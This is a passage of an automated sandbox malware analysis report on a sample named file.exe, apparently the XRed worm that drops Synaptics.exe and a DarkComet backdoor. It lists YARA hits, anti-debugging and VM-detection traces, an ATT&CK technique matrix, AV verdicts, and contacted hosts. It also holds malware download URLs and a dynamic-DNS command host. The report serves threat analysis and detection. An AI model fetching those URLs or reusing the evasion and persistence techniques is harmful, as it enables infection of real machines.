                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWk(
                              Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin`
                              Source: Amcache.hve.17.drBinary or memory string: \driver\vmci,\driver\pci
                              Source: Amcache.hve.17.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.17.drBinary or memory string: VMware20,1
                              Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.17.drBinary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.17.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.17.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                              Source: Amcache.hve.17.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.17.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.17.drBinary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.17.drBinary or memory string: VMware VMCI Bus Device
                              Source: Amcache.hve.17.drBinary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.17.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: wordpad.exe, 0000000B.00000003.1627079273.0000000007EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Amcache.hve.17.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Users\user\Desktop\._cache_file.exeAPI call chain: ExitProcess graph end nodegraph_2-2537
                              Source: C:\Users\user\Desktop\._cache_file.exeAPI call chain: ExitProcess graph end nodegraph_2-2873
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeAPI call chain: ExitProcess graph end nodegraph_4-72211
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_00292BA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00292BA5
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C91C78B VirtualProtect ?,-00000001,00000104,?4_2_6C91C78B
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010029C2 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,2_2_010029C2
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01005899 InitializeCriticalSectionAndSpinCount,#17,GetProcessHeap,CreateEventA,CreateEventA,CreateEventA,CreateThread,WaitForSingleObject,SendDlgItemMessageA,Sleep,ShowWindow,SetParent,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,LoadStringA,LoadStringA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,CreateFileA,GetFileSize,ReadFile,CloseHandle,DeleteFileA,SendDlgItemMessageA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,ExpandEnvironmentStringsA,CreateProcessA,ShowWindow,WaitForSingleObject,GetExitCodeProcess,CloseHandle,ShowWindow,LoadStringA,MessageBoxA,DeleteCriticalSection,ExitProcess,2_2_01005899
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010062FF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_010062FF
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_00292BA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00292BA5
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_002945BE _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_002945BE
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6396B38A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6396B38A
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_639687C1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_639687C1
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5D171F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C5D171F
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8F76A7 __EH_prolog3,GetModuleHandleW,GetProcAddress,SetThreadStackGuarantee,SetUnhandledExceptionFilter,GetCommandLineW,4_2_6C8F76A7
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C91EB6A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C91EB6A
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C91B091 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C91B091
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess created: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /pJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess created: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /pJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01004F6B InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,CloseHandle,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,2_2_01004F6B
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01003D02 AllocateAndInitializeSid,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLengthSid,GetTokenInformation,GetLengthSid,2_2_01003D02
                              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01004F6B InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,CloseHandle,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,2_2_01004F6B
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8F7B40 __EH_prolog3_GS,GetCommandLineW,_memset,GetTimeZoneInformation,GetThreadLocale,4_2_6C8F7B40
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01003972 OpenEventA,WaitForSingleObject,CloseHandle,Sleep,LoadLibraryA,GetProcAddress,WaitForSingleObject,GetLastError,InitiateSystemShutdownA,GetLastError,WaitForSingleObject,GetLastError,GetVersionExA,GetVersionExA,GetVersionExA,GetSystemDirectoryA,strchr,CreateFileA,FlushFileBuffers,CloseHandle,NtShutdownSystem,FreeLibrary,2_2_01003972
                              Source: C:\Users\user\Desktop\._cache_file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                              Source: Amcache.hve.17.drBinary or memory string: msmpeng.exe
                              Source: Amcache.hve.17.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                              Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                              Source: Amcache.hve.17.drBinary or memory string: MsMpEng.exe

                              Stealing of Sensitive Information

                              barindex
                              Yara detected XRed
                              Source: Yara matchFile source: file.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7712, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX3CE.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeDirectory queried: C:\Users\user\Documents

                              Remote Access Functionality

                              barindex
                              Yara detected XRed
                              Source: Yara matchFile source: file.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7712, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX3CE.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information41
                              Scripting                              		1
                              Replication Through Removable Media                              		2
                              Native API                              		41
                              Scripting                              		1
                              DLL Side-Loading                              		11
                              Disable or Modify Tools                              		OS Credential Dumping2
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		4
                              Ingress Tool Transfer                              		Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomainsDefault Accounts3
                              Command and Scripting Interpreter                              		1
                              DLL Side-Loading                              		1
                              Extra Window Memory Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory1
                              Peripheral Device Discovery                              		Remote Desktop Protocol1
                              Data from Local System                              		21
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts2
                              Service Execution                              		11
                              Windows Service                              		1
                              Access Token Manipulation                              		3
                              Obfuscated Files or Information                              		Security Account Manager14
                              File and Directory Discovery                              		SMB/Windows Admin SharesData from Network Shared Drive3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Registry Run Keys / Startup Folder                              		11
                              Windows Service                              		1
                              DLL Side-Loading                              		NTDS18
                              System Information Discovery                              		Distributed Component Object ModelInput Capture34
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                              Process Injection                              		1
                              Extra Window Memory Injection                              		LSA Secrets131
                              Security Software Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                              Registry Run Keys / Startup Folder                              		22
                              Masquerading                              		Cached Domain Credentials11
                              Virtualization/Sandbox Evasion                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                              Virtualization/Sandbox Evasion                              		DCSync2
                              Process Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              Access Token Manipulation                              		Proc Filesystem1
                              Application Window Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583477 Sample: file.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 58 freedns.afraid.org 2->58 60 xred.mooo.com 2->60 62 4 other IPs or domains 2->62 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Antivirus detection for URL or domain 2->68 72 13 other signatures 2->72 10 file.exe 1 6 2->10         started        13 EXCEL.EXE 221 56 2->13         started        15 Synaptics.exe 2->15         started        signatures3 70 Uses dynamic DNS services 58->70 process4 file5 44 C:\ProgramData\Synaptics\Synaptics.exe, PE32 10->44 dropped 46 C:\ProgramData\Synaptics\RCX3CE.tmp, PE32 10->46 dropped 48 C:\...\Synaptics.exe:Zone.Identifier, ASCII 10->48 dropped 50 C:\Users\user\Desktop\._cache_file.exe, PE32 10->50 dropped 17 Synaptics.exe 86 10->17         started        22 ._cache_file.exe 77 10->22         started        process6 dnsIp7 52 docs.google.com 172.217.18.14, 443, 49788, 49789 GOOGLEUS United States 17->52 54 drive.usercontent.google.com 216.58.206.65, 443, 49803, 49805 GOOGLEUS United States 17->54 56 freedns.afraid.org 69.42.215.252, 49797, 80 AWKNET-LLCUS United States 17->56 34 C:\Users\user\Documents\AFWAAFRXKO\~$cache1, PE32 17->34 dropped 74 Antivirus detection for dropped file 17->74 76 Multi AV Scanner detection for dropped file 17->76 78 Drops PE files to the document folder of the user 17->78 80 Machine Learning detection for dropped file 17->80 24 WerFault.exe 17->24         started        36 C:\...\sqmapi.dll, PE32 22->36 dropped 38 C:\...\SetupUi.dll, PE32 22->38 dropped 40 C:\...\SetupEngine.dll, PE32 22->40 dropped 42 11 other files (none is malicious) 22->42 dropped 26 Setup.exe 2 9 22->26         started        file8 signatures9 process10 process11 28 wordpad.exe 26->28         started        30 wordpad.exe 26->30         started        process12 32 splwow64.exe 28->32         started       

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              file.exe92%ReversingLabsWin32.Worm.Zorex
                              file.exe100%AviraTR/Dldr.Agent.SH
                              file.exe100%AviraW2000M/Dldr.Agent.17651006
                              file.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\Synaptics\RCX3CE.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCX3CE.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\RCX3CE.tmp100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\36a8a8e2fed651ec27d1eed188bb35\1028\SetupResources.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\1031\SetupResources.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\1033\SetupResources.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\1036\SetupResources.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\1040\SetupResources.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\1041\SetupResources.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\1042\SetupResources.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\1049\SetupResources.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\2052\SetupResources.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\3082\SetupResources.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\SetupEngine.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\SetupUi.dll0%ReversingLabs
                              C:\36a8a8e2fed651ec27d1eed188bb35\sqmapi.dll0%ReversingLabs
                              C:\ProgramData\Synaptics\RCX3CE.tmp94%ReversingLabsWin32.Backdoor.DarkComet
                              C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Worm.Zorex
                              C:\Users\user\Desktop\._cache_file.exe0%ReversingLabs
                              C:\Users\user\Documents\AFWAAFRXKO\~$cache194%ReversingLabsWin32.Backdoor.DarkComet

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://xred.site50.net/syn/SUpdate.iniZ100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/SUpdate.iniH)k100%Avira URL Cloudmalware
                              https://drive.use0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/Synaptics.rarZ100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/SSLLibrary.dlp100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/SSLLibrary.dll6100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              		69.42.215.252
                              		truefalse
                                		high
                                docs.google.com
                                		172.217.18.14
                                		truefalse
                                  		high
                                  s-part-0017.t-0009.t-msedge.net
                                  		13.107.246.45
                                  		truefalse
                                    		high
                                    drive.usercontent.google.com
                                    		216.58.206.65
                                    		truefalse
                                      		high
                                      xred.mooo.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        xred.mooo.comfalse
                                          		high
                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                            		high

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://drive.useSynaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drfalse
                                                		high
                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drfalse
                                                  		high
                                                  https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drfalse
                                                    		high
                                                    http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://xred.site50.net/syn/SUpdate.iniSynaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drfalse
                                                        		high
                                                        http://xred.site50.net/syn/SSLLibrary.dlpfile.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://xred.site50.net/syn/SUpdate.iniH)kfile.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://xred.site50.net/syn/Synaptics.rarSynaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drfalse
                                                                		high
                                                                https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.2033802566.000000001A93E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2004023076.000000000ACBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2027067816.00000000156BE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://xred.site50.net/syn/SSLLibrary.dllSynaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drfalse
                                                                    		high
                                                                    https://docs.google.com/Synaptics.exe, 00000003.00000002.1980458813.0000000000591000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2014101336.000000000EA0A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006B05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlfile.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        172.217.18.14
                                                                        		docs.google.comUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        216.58.206.65
                                                                        		drive.usercontent.google.comUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        69.42.215.252
                                                                        		freedns.afraid.orgUnited States
                                                                        		17048AWKNET-LLCUSfalse

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1583477
                                                                        Start date and time:2025-01-02 20:28:32 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 8m 57s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:21
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Sample name:file.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.expl.evad.winEXE@16/120@11/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 66.7%
                                                                        HCA Information:
                                                                        • Successful, ratio: 89%
                                                                        • Number of executed functions: 215
                                                                        • Number of non-executed functions: 198
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 52.109.32.97, 184.28.90.27, 52.113.194.132, 20.189.173.17, 20.42.73.29, 13.107.246.45, 20.190.160.17, 4.245.163.56
